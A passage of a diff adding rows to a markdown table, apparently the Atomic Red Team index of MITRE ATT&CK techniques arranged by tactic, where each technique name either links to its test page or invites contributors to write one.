+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Launchd](../../T1053.004/T1053.004.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Share Discovery](../../T1135/T1135.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | [Scheduled Task](../../T1053.005/T1053.005.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
+| | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keychain](../../T1555.001/T1555.001.md) | [Process Discovery](../../T1057/T1057.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Data Staging](../../T1074.001/T1074.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | [Service Execution](../../T1569.002/T1569.002.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Local Email Collection](../../T1114.001/T1114.001.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
+| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | LSA Secrets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LSASS Memory](../../T1003.001/T1003.001.md) | [Software Discovery](../../T1518/T1518.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | [Unix Shell](../../T1059.004/T1059.004.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Volume Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | [Screen Capture](../../T1113/T1113.md) | | [Non-Standard Port](../../T1571/T1571.md) | |
+| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Emond](../../T1546.014/T1546.014.md) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Network Sniffing](../../T1040/T1040.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | [Windows Command Shell](../../T1059.003/T1059.003.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Service Discovery](../../T1007/T1007.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | [System Time Discovery](../../T1124/T1124.md) | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Emond](../../T1546.014/T1546.014.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Remote Access Software](../../T1219/T1219.md) | |
+| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
+| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
+| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Launch Agent](../../T1543.001/T1543.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launchd](../../T1053.004/T1053.004.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | [Launch Agent](../../T1543.001/T1543.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [HISTCONTROL](../../T1562.003/T1562.003.md) | | | | | | | |
+| | | [Launch Daemon](../../T1543.004/T1543.004.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Launchd](../../T1053.004/T1053.004.md) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | |
+| | | [Local Account](../../T1136.001/T1136.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | |
+| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | |
+| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](../../T1547.011/T1547.011.md) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
+| | | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | |
+| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
+| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | |
+| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | |
+| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Rc.common](../../T1037.004/T1037.004.md) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | |
+| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
+| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Rc.common](../../T1037.004/T1037.004.md) | [Security Support Provider](../../T1547.005/T1547.005.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Services File Permissions Weakness](../../T1574.010/T1574.010.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
+| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
+| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | |
+| | | SSH Authorized Keys [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](../../T1037.005/T1037.005.md) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
+| | | [Scheduled Task](../../T1053.005/T1053.005.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
+| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Service](../../T1543.002/T1543.002.md) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
+| | | [Screensaver](../../T1546.002/T1546.002.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
+| | | [Security Support Provider](../../T1547.005/T1547.005.md) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
+| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
+| | | [Services File Permissions Weakness](../../T1574.010/T1574.010.md) | Token Impersonation/Theft [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
+| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Trap](../../T1546.005/T1546.005.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | |
+| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Startup Items](../../T1037.005/T1037.005.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
